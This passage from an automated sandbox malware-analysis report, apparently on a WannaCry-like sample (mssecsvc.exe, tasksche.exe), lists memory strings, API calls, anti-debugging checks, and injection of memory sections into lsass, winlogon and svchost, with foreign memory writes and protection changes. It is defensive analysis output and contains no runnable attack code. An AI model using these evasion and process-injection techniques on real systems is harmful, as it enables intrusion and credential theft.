SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%20INC.&OEMID=VMWARE%2C%20INC.&OSSKU=PROFESSIONAL&SMBIOSDM=VMWARE7%2C1&TL=2&TSU=1611218&WAASBLDFLT=1&WAASCFGEXP=1&WAASCFGSET=1&WAASRETAIL=1&WAASRING=&CHNL=CFD0,"requ
              Source: lsass.exe, 00000009.00000002.792607879.00000240B2613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.275771857.00000240B2613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285123785.00000240B2613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.791962737.000002DDC763D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.795563189.000001F18B868000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.791833204.0000022B27E29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.390460408.000002C301E2D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.791425086.000002C301E2D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.799675705.00000247D1CB5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000000.395952690.00000247D1CB5000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.801576045.000002418A63F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: backgroundTaskHost.exe, 00000024.00000000.557062800.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.587020146.000001D4264FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@Lx&
              Source: lsass.exe, 00000009.00000002.798535635.00000240B2694000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicvss-block-out
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "@vmicshutdown-block-in
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicheartbeat-allow-in-2
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Allow inbound TCP port 636 traffic for vmicheartbeat
              Source: svchost.exe, 00000019.00000002.682002593.000001FF10C64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
              Source: svchost.exe, 00000010.00000000.300104611.0000025CB5036000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicheartbeat
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@vmicheartbeat
              Source: svchost.exe, 0000000E.00000002.788049235.000002DDC7602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
              Source: lsass.exe, 00000009.00000002.798535635.00000240B2694000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
              Source: mssecsvc.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Driver
              Source: svchost.exe, 00000021.00000002.817775099.00000247D36C5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Allow inbound TCP port 389 traffic for vmicheartbeatLMEMp
              Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: .@Block any other outbound traffic for vmicheartbeat
              Source: lsass.exe, 00000009.00000000.285583942.00000240B2669000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.275907393.00000240B2669000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.796622060.00000240B2669000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Adm B
              Source: svchost.exe, 00000010.00000000.300104611.0000025CB5036000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmicheartbeat
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Block any outbound traffic for vmicshutdown
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,4_2_00B93D36
              Source: C:\Windows\tasksche.exeCode function: 29_2_004029CC free,GetProcessHeap,HeapFree,29_2_004029CC
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9042D rdtsc 4_2_00B9042D
              Source: C:\Windows\mssecsvc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B905F2 mov eax, dword ptr fs:[00000030h]4_2_00B905F2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9042D mov eax, dword ptr fs:[00000030h]4_2_00B9042D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9025E mov edx, dword ptr fs:[00000030h]4_2_00B9025E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA05F2 mov eax, dword ptr fs:[00000030h]4_2_7FEA05F2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA025E mov edx, dword ptr fs:[00000030h]4_2_7FEA025E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA042D mov eax, dword ptr fs:[00000030h]4_2_7FEA042D
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A805F2 mov eax, dword ptr fs:[00000030h]11_2_00A805F2
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A8042D mov eax, dword ptr fs:[00000030h]11_2_00A8042D
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A8025E mov edx, dword ptr fs:[00000030h]11_2_00A8025E
              Source: C:\Windows\mssecsvc.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\winlogon.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\lsass.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\dwm.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\System32\backgroundTaskHost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\reytVt target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\winlogon.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\lsass.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\fontdrvhost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeSection loaded: \BaseNamedObjects\npbtVt target: C:\Windows\System32\dwm.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 19B7D740000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D426310000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D426310000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D426310000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000Jump to behavior
              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: 1D423FC0000Jump to behavior
              Changes memory attributes in foreign processes to executable or writable
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E99D0 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA120 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9670 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9A50 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773E9830 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\mssecsvc.exeMemory protected: unknown base: 773EA040 protect: page execute and read and writeJump to behavior
